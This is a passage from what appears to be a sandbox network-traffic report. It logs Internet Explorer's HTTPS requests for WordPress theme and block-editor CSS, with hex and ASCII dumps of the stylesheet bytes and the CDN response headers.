                                                                                              2021-12-13 23:57:32 UTC8303INData Raw: 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61
                                                                                              Data Ascii: lock-navigation.wp-block-navigation.has-background .has-child .submenu-container .submenu-container,.wp-block-navigation.wp-block-navigation.has-background .has-child .submenu-container .wp-block-navigation-link__container,.wp-block-navigation.wp-block-na
                                                                                              2021-12-13 23:57:32 UTC8304INData Raw: 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 69 73 2d 72 65 73 70 6f 6e 73 69 76 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 7d 2e 69 73 2d 76 65 72 74 69 63 61 6c 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 7d 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d
                                                                                              Data Ascii: vigation__container .is-responsive{display:none}@media (min-width:600px){.wp-block-navigation__container{display:flex;flex-wrap:wrap}.is-vertical .wp-block-navigation__container{display:block;flex-direction:column;align-items:flex-start}}.items-justified-
                                                                                              2021-12-13 23:57:32 UTC8306INData Raw: 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 61 67 65 2d 6c 69 73 74 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f
                                                                                              Data Ascii: navigation__container .wp-block-page-list{flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-link,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-link .wp-block-navigation-link__
                                                                                              2021-12-13 23:57:32 UTC8307INData Raw: 65 72 3b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6c 6f 73 65 20 73 76 67 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 6f 70 65 6e 20 73 76 67 7b 66 69 6c 6c 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 34 70 78
                                                                                              Data Ascii: er;color:currentColor;background:transparent;border:none;margin:0;padding:0}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;pointer-events:none;display:block;width:24px;height:24px
                                                                                              2021-12-13 23:57:32 UTC8308INData Raw: 75 2d 6f 70 65 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 68 61 73 2d 63 68 69 6c 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 70 61 63 69 74 79 3a 31 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 30 20 33 32 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67
                                                                                              Data Ascii: u-open .has-child .submenu-container,.wp-block-navigation .wp-block-navigation__responsive-container.is-menu-open .has-child .wp-block-navigation-link__container{position:relative;opacity:1;visibility:visible;padding:0 0 0 32px;border:none}.wp-block-navig
                                                                                              2021-12-13 23:57:32 UTC8310INData Raw: 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 68 6f 6d 65 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 68 6f 6d 65 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 68 6f 6d 65 2d 6c 69 6e 6b 5f 5f 63 6f 6e 74 61 69 6e 65 72
                                                                                              Data Ascii: -navigation__container .wp-block-home-link__container{background-color:#fff;color:#000;border:1px solid rgba(0,0,0,.15)}.wp-block-navigation:not(.has-background) .wp-block-navigation__container .wp-block-home-link__container .wp-block-home-link__container
                                                                                              2021-12-13 23:57:32 UTC8311INData Raw: 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 61 75 74 68 6f 72 5f 5f 61 76 61 74 61 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 61 75 74 68 6f 72 5f 5f 62 69 6f 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 61 75 74 68 6f 72 5f 5f 63 6f 6e 74 65 6e 74 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6c 65 78 2d 62 61 73 69 73 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 61 75 74 68 6f 72 5f 5f 6e 61 6d 65 7b 66 6f 6e 74 2d 77 65
                                                                                              Data Ascii: {width:100%;margin-top:0;margin-bottom:0;font-size:.5em}.wp-block-post-author__avatar{margin-right:1em}.wp-block-post-author__bio{margin-bottom:.7em;font-size:.7em}.wp-block-post-author__content{flex-grow:1;flex-basis:0}.wp-block-post-author__name{font-we
                                                                                              2021-12-13 23:57:32 UTC8343INData Raw: 65 72 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 75 6d 6e 73 2d 34 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 75 6d 6e 73 2d 35 3e 6c 69 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 65 72 79 2d 6c 6f 6f 70 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 75 6d 6e 73 2d 35 3e 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28 32 30 25 20 2d 20 31 65 6d 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d
                                                                                              Data Ascii: er.is-flex-container.columns-4>li:nth-child(4n){margin-right:0}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li,.wp-block-query-loop.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-
                                                                                              2021-12-13 23:57:32 UTC8347INData Raw: 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69
                                                                                              Data Ascii: social-links{display:flex;flex-wrap:wrap;padding-left:0;padding-right:0;text-indent:0;margin-left:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{text-decoration:none;border-bottom:0;box-shadow:none}.wp-block-soci
                                                                                              2021-12-13 23:57:32 UTC8349INData Raw: 33 61 64 34 0d 0a 79 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 64 72 6f 70 62 6f 78 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 32 38 30 66 66 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 65 74 73 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 34 35 38 30 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 66 61 63 65 62 6f 6f 6b 7b 62 61 63 6b 67 72
                                                                                              Data Ascii: 3ad4y) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-etsy{background-color:#f45800;color:#fff}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-facebook{backgr
                                                                                              2021-12-13 23:57:32 UTC8353INData Raw: 69 61 6c 2d 6c 69 6e 6b 73 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 65 74 73 79 7b 63 6f 6c 6f 72 3a 23 66 34 35 38 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 66 61 63 65 62 6f 6f 6b 7b 63 6f 6c 6f 72 3a 23 31 37 37 38 66 32 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 66 69 76 65 68 75 6e 64 72 65 64 70 78 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 69
                                                                                              Data Ascii: ial-links.is-style-logos-only .wp-social-link-etsy{color:#f45800}.wp-block-social-links.is-style-logos-only .wp-social-link-facebook{color:#1778f2}.wp-block-social-links.is-style-logos-only .wp-social-link-fivehundredpx{color:#000}.wp-block-social-links.i
                                                                                              2021-12-13 23:57:32 UTC8357INData Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 66 62 65 35 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 2e 68 61 73 2d 73 75 62 74 6c 65 2d 70 61 6c 65 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 74 62 6f 64 79 20 74 72 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 37 66 35 66 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 2e 68 61 73 2d 73 75 62 74 6c 65 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 74 62 6f 64 79 20 74 72 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66
                                                                                              Data Ascii: ground-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#f
                                                                                              2021-12-13 23:57:32 UTC8361INData Raw: 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 65 65 65 2c 23 61 39 62 38 63 33 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 34 61 65 61 64 63 2c 23 39 37 37 38 64 31 20 32 30 25 2c 23 63 66 32 61 62 61 20 34 30 25 2c 23 65 65 32 63 38 32 20 36 30 25 2c 23 66 62 36 39 36 32 20 38 30 25 2c 23 66 65 66 38 34 63 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72
                                                                                              Data Ascii: inear-gradient(135deg,#eee,#a9b8c3)}:root .has-cool-to-warm-spectrum-gradient-background{background:linear-gradient(135deg,#4aeadc,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c)}:root .has-blush-light-purple-gradient-background{background:linear
                                                                                              2021-12-13 23:57:32 UTC8364INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              8192.168.2.349766104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8342OUTGET /css/websetnet.net/wp-content/themes/magazine-pro/lib/gutenberg/front-end.css HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8364INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/css
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a59cf7690a-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"b709152d6840be9cff8445cbdfa6c451de205af33440c16db9813d980b7a9b1f"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-156
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21979-LGA, cache-fra19156-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8365INData Raw: 32 32 61 39 0d 0a 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 64 72 6f 70 2d 63 61 70 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 3a 66 69 72 73 74 2d 6c 65 74 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 37 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 2e 31 65 6d 20 2e 30 38 65 6d 20 30 20 2d 2e 30 38 65 6d 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 2e 68 61 73 2d 64 72 6f 70 2d 63 61 70 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 3a 66 69 72 73 74 2d 6c 65 74 74 65 72 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 2e 68 61 73 2d 64 72 6f 70 2d 63 61 70 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 3a 66 69 72 73 74 2d 6c 65 74 74
                                                                                              Data Ascii: 22a9.entry-content p.has-drop-cap:not(:focus)::first-letter{font-size:7.7em;margin:.1em .08em 0 -.08em}.entry-content p.has-larger-font-size.has-drop-cap:not(:focus)::first-letter,.entry-content p.has-small-font-size.has-drop-cap:not(:focus)::first-lett
                                                                                              2021-12-13 23:57:32 UTC8366INData Raw: 65 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 2e 61 6c 69 67 6e 66 75 6c 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 30 70 78 7d 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 65 6e 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 3e 2e 61 6c 69 67 6e 66 75 6c 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 63 61 6c 63 28 2d 31 30 30 76 77 2f 32 20 2b 20 31 30 30 25 2f 32 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 63 61 6c 63 28 2d 31
                                                                                              Data Ascii: e .alignright{margin-left:2em}.wp-block-image.alignwide,.wp-block-image.alignfull,.wp-block-embed.alignwide,.wp-block-embed.alignfull{margin-bottom:30px}.full-width-content .entry-content>.alignfull{margin-left:calc(-100vw/2 + 100%/2);margin-right:calc(-1
                                                                                              2021-12-13 23:57:32 UTC8368INData Raw: 38 70 78 7d 2e 67 62 2d 62 6c 6f 63 6b 2d 63 74 61 20 2e 67 62 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 61 6c 65 77 61 79 2c 73 61 6e 73 2d 73 65 72 69 66 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 61 6c 65 77 61 79 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 32 34 70 78 3b 74 65 78 74
                                                                                              Data Ascii: 8px}.gb-block-cta .gb-button{font-family:Raleway,sans-serif;text-transform:uppercase}.site-container .wp-block-button .wp-block-button__link{border-width:0;border-radius:0;cursor:pointer;font-size:16px;font-family:Raleway,sans-serif;padding:16px 24px;text
                                                                                              2021-12-13 23:57:32 UTC8369INData Raw: 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 62 6c 6f 63 6b 71 75 6f 74 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 2d 36 30 70 78 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 73 6f 6c 69 64 2d 63 6f 6c 6f 72 20 62 6c 6f 63 6b 71 75 6f 74 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 36 70 78 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 62 6c 6f 63 6b 71 75 6f 74 65 2e 68 61 73
                                                                                              Data Ascii: .wp-block-pullquote blockquote::before{color:#222;font-size:60px;left:0;text-align:center;top:-60px}.site-container .wp-block-pullquote.is-style-solid-color blockquote::before{color:#fff;padding-top:16px}.site-container .wp-block-pullquote blockquote.has
                                                                                              2021-12-13 23:57:32 UTC8370INData Raw: 64 2d 63 6f 6c 6f 72 20 63 69 74 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 63 69 74 65 2c 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 70 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 20 66 69 67 63 61 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77
                                                                                              Data Ascii: d-color cite{color:#fff}.site-container .wp-block-pullquote .has-text-color cite,.site-container .wp-block-pullquote .has-text-color p{color:currentColor}.blocks-gallery-caption{width:100%}.blocks-gallery-item figcaption{margin-bottom:0}.site-container .w
